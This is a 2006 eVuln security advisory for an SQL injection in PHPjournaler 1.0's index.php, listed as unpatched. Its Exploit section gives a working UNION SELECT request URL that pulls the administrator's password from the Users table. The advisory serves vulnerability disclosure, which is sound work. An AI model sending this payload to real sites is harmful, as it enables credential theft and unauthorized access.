New eVuln Advisory: PHPjournaler SQL Injection Vulnerability --------------------Summary---------------- Software: PHPjournaler Versions: 1.0 Critical Level: Moderate Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com) Published: 2006.01.01 eVuln ID: EV0009 -----------------Description-------------- Vulnerable scripts: index.php Variable $readold isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code. Administrator's password is threatened. --------------Exploit--------------------- Show Administrator's password: http://host/phpjournaler/index.php?readold=999%20union%20select%201,password,3,4,name,6%20from%20Users/* --------------Solution--------------------- No Patch available. --------------Credit--------------------- Original Advisory: http://evuln.com/vulns/9/summary.html Discovered by: Aliaksandr Hartsuyeu (alex@evuln.com)